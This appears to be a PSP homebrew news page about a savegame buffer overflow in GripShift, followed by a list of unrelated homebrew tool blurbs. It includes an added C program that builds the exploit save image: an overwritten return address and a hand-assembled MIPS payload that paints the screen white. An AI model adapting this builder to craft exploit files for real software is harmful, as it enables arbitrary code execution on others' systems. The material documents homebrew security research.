Aah, yes, new exploit, old game. It's so cool to actually see this beauty working - and on a PSP-3000 no less! The PSP scene was buzzing the other day when MaTiAz found an exploit (read: buffer overflow!) in the three-year-old game, GripShift.
MaTiAz says that they've yet to find any further use for this, but it's still a new exploit. It could lead to further hacks, and for now, it's merely a proof of concept. Be that as it may, this is a great start, and a rather sweet find! Here's MaTiAz explaining the exploit:
GripShift has a buffer overflow vulnerability when loading savegames. The savegame contains the profile name which can be easily used to overwrite $ra. The savegame file is pretty big (25kB) so you have lots of space to put your code there. I wrote a simple blob of code to paint the framebuffer completely white (to just indicate that arbitrary code is running). The return address is located at offset 0xA9 in the file. In this poc it points to 0x08E4CD50 (which is only a few bytes after the return address), and the code starts at 0xCC in the file.
It was tested on 4.01M33-2 with US version of GripShift (ULUS10040), and psplink.prx, usbhostfs.prx and deemerh.prx loaded (also without psplink and usbhostfs). The decrypted savegame (sorry, couldn't [be bothered to] get Shine's savegame tool working so it's in plaintext form) is in the SDDATA.BIN form which Hellcat's Savegame-Deemer produces (thanks to him, if the program didn't exist I wouldn't have bothered with this.). Just copy the ULUS10040SAVE00 directory to /PSP/SAVEPLAIN/ and run the game. EDIT: yeah, don't forget to have Savegame-Deemer working, duh.
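What the description above amounts to, as an added example (my code, not MaTiAz's PoC or his savegame): a host-side C program that lays out a plaintext save image with the saved $ra overwritten at file offset 0xA9 with 0x08E4CD50, a small hand-assembled MIPS payload at offset 0xCC that paints VRAM white, and filler bytes in between. Assumed, because the write-up does not state them: the exact file size (25000 bytes), the VRAM address and frame size the payload writes, the 'A' filler, and that only the bytes up to and including $ra need to survive a C-string copy of the profile name (the payload runs from the loaded file image, not from the copied name). The layout checks are the ones worth running before trying any such file on hardware: the code must not overlap the $ra slot, the new $ra must be word-aligned, and it must contain no zero byte.

```c
/*
 * Added example (not MaTiAz's code or files): lay out a plaintext
 * savegame image that overwrites the saved $ra at a known file offset and
 * points it at a MIPS payload placed later in the same file, using the
 * offsets from the write-up above. Host-side C99; writes the blob to disk
 * so it can be inspected in a hex editor.
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SAVE_SIZE   25000u      /* "pretty big (25kB)"; exact size is assumed     */
#define RA_OFFSET   0xA9u       /* saved $ra slot in the file (from the write-up) */
#define RA_VALUE    0x08E4CD50u /* where the overwritten $ra points (write-up)    */
#define CODE_OFFSET 0xCCu       /* payload start in the file (from the write-up)  */

/* MIPS32 I-type encoder: op(6) rs(5) rt(5) imm(16). The PSP's Allegrex is
 * little-endian MIPS, so each word is stored LSB first below. */
#define MIPS_I(op, rs, rt, imm) \
    (((uint32_t)(op) << 26) | ((uint32_t)(rs) << 21) | \
     ((uint32_t)(rt) << 16) | ((uint32_t)(imm) & 0xFFFFu))
#define LUI(rt, imm)       MIPS_I(0x0F, 0, rt, imm)
#define ORI(rt, rs, imm)   MIPS_I(0x0D, rs, rt, imm)
#define ADDIU(rt, rs, imm) MIPS_I(0x09, rs, rt, imm)
#define SW(rt, base, off)  MIPS_I(0x2B, base, rt, off)
#define BNE(rs, rt, off)   MIPS_I(0x05, rs, rt, off)
#define BEQ(rs, rt, off)   MIPS_I(0x04, rs, rt, off)
#define NOP                0u
enum { ZERO = 0, T0 = 8, T1 = 9, T2 = 10 };

/* Payload: fill the display buffer with 0xFFFFFFFF (white), then spin.
 * Assumptions: VRAM through the uncached alias 0x44000000, 512x272 pixels
 * at 4 bytes each (0x88000 bytes). Branch offsets are in words relative to
 * the delay slot, hence -4 for the loop and -1 for the hang. */
static const uint32_t paint_white[] = {
    LUI(T0, 0x4400),          /* t0 = 0x44000000, start of VRAM (assumed)    */
    LUI(T1, 0x0008),          /* t1 = 0x00080000                             */
    ORI(T1, T1, 0x8000),      /* t1 = 0x00088000, bytes to write             */
    ADDIU(T2, ZERO, 0xFFFF),  /* t2 = 0xFFFFFFFF (sign-extended -1)          */
    SW(T2, T0, 0),            /* loop: *(uint32_t *)t0 = t2                  */
    ADDIU(T0, T0, 4),         /*       t0 += 4                               */
    ADDIU(T1, T1, 0xFFFC),    /*       t1 -= 4                               */
    BNE(T1, ZERO, 0xFFFC),    /*       if (t1 != 0) goto loop                */
    NOP,                      /*       branch delay slot                     */
    BEQ(ZERO, ZERO, 0xFFFF),  /* hang: goto hang                             */
    NOP,                      /*       branch delay slot                     */
};

static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Build the image into buf. Returns SAVE_SIZE, or 0 if the layout is
 * inconsistent: payload overlaps the $ra slot or overruns the file, or the
 * new $ra is misaligned or contains a NUL byte. */
size_t build_savegame(uint8_t *buf, size_t cap) {
    size_t code_bytes = sizeof paint_white;
    if (cap < SAVE_SIZE) return 0;
    if (RA_OFFSET + 4 > CODE_OFFSET) return 0;         /* code must sit past $ra */
    if (CODE_OFFSET + code_bytes > SAVE_SIZE) return 0;
    if (RA_VALUE & 3u) return 0;                        /* MIPS needs aligned PC  */
    for (int i = 0; i < 32; i += 8)                     /* a C-string copy stops  */
        if (((RA_VALUE >> i) & 0xFFu) == 0) return 0;   /* at NUL: no zero bytes  */
    memset(buf, 'A', SAVE_SIZE);                        /* non-NUL filler (assumed) */
    put_le32(buf + RA_OFFSET, RA_VALUE);
    for (size_t i = 0; i < code_bytes / 4; i++)
        put_le32(buf + CODE_OFFSET + 4 * i, paint_white[i]);
    return SAVE_SIZE;
}

/* Convenience wrapper over a static buffer; NULL if the layout check fails. */
const uint8_t *build_default_savegame(void) {
    static uint8_t image[SAVE_SIZE];
    return build_savegame(image, sizeof image) ? image : NULL;
}

int main(int argc, char **argv) {
    const char *path = argc > 1 ? argv[1] : "SDDATA.BIN";
    const uint8_t *img = build_default_savegame();
    if (!img) { fputs("layout check failed\n", stderr); return 1; }
    FILE *f = fopen(path, "wb");
    if (!f || fwrite(img, 1, SAVE_SIZE, f) != SAVE_SIZE) { perror(path); return 1; }
    fclose(f);
    printf("wrote %u bytes to %s: $ra @0x%X -> 0x%08X, code @0x%X (%zu bytes)\n",
           SAVE_SIZE, path, RA_OFFSET, RA_VALUE, CODE_OFFSET, sizeof paint_white);
    return 0;
}
```

Build with `cc -std=c99 -o poc_layout poc_layout.c` and open the output in a hex editor. It is not a drop-in GripShift save: everything in the file other than the two marked regions belongs to the game's own format, which the Savegame-Deemer dump supplies. The point is the builder pattern and its checks, which are what you adjust when a different game, save layout or load address is involved.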
Similar Software:
MacroFire - Japanese developer pen is back on the scene to release a new version of MacroFire, a handy homebrew plugin that allows you to reassign the PSP buttons, adjust your analog stick's sensitivity and enable rapidfire mode, according to your desired taste
1.50 Helper (2.5 2.6 Downgrader Helper)
In case of passworded files (the downgrader files are), the password is I_USE_AT_MY_OWN_RISKS
Yes, you have read the title right - 2.50/2.60 Downgrader. Dark_Alex, along with Mathieulh and Yoshihiro from SonyXTeam, have released the first working 2.50/2.60 downgrader
Ultimate Pandora's Tool
Latest version of UPT incorporating DC3, DC4, DC5 & DC7, WiFi downloads, updated UL, a modified version of DC7 to load Cory1492's excellent app nandTool 0.4 fully personalized for PSP4Noobz, a new firmware install look with progress bar as well as other functions.
UPTv5 will not run under the 1.50 Kernel, the minimum it has been tested on 3
AutoBoot Fixer
If you're having trouble trying to automatically run homebrew programs from your PlayStation Portable's BOOT directory, then you might find this latest plugin from developer Red_Squirrel quite useful. Entitled "AutoBoot Fixer", this homebrew plugin allows you to use the "Autorun program at /PSP/GAME/BOOT/EBOOT
Control Fan Utility 1.10: An Alexander Mod With Coolness in Mind - Following up on his Iris Manager release, Alexander is back with a small update to Control Fan Utility. Guess what? It supports CFW 4.50!
If you fear that your PS3 will one day be rendered useless by a YLOD, check out this awesome mod by Alexander
Ultimate VSH Menu
After what he admits as "the worst release of Ultimate VSH Menu," Total_Noob is back with an update for Ultimate VSH Menu, complete with an apology for the crashes from the previous version.
This new v1.07 seeks to mend that with one big bulk of a changelog
BwE Nor Validator
BwE is back with an important update to their NOR validation tool. Want to verify that system dump? This app is one of the best!
BetterWayElectronics told us not too long ago that they felt development for NOR Validator had just about finished. Apparently the team seems to have changed their minds and released this completely new version numbered at 1.30
Reboot for CIntro
A couple of days ago, QJ tipster bruce33 sent us a note regarding a homebrew application called Recovery mode 3.40 from Playstation Portable (PSP) online site TeknoPSP. He sent us a note again today about another application from the same site. It's about Reboot for CIntro
FW2.50 TA-082 Check & Dump
"Maybe later I will make software to let "FW2.50 TA-082" users dump "NandFlash & DDR DRam" data to me, then I can make the "FW1.00/1
multiMAN Tools
Have the new version of multiMAN designed to work with 4.46 CFW? Grab some updated plugins here!
Deank just recently updated his popular manager application to support the newly released 4.46 CFWs. Should you be a user in the new environment, you are going to need these updated plugins to get the most out of your backup loading experience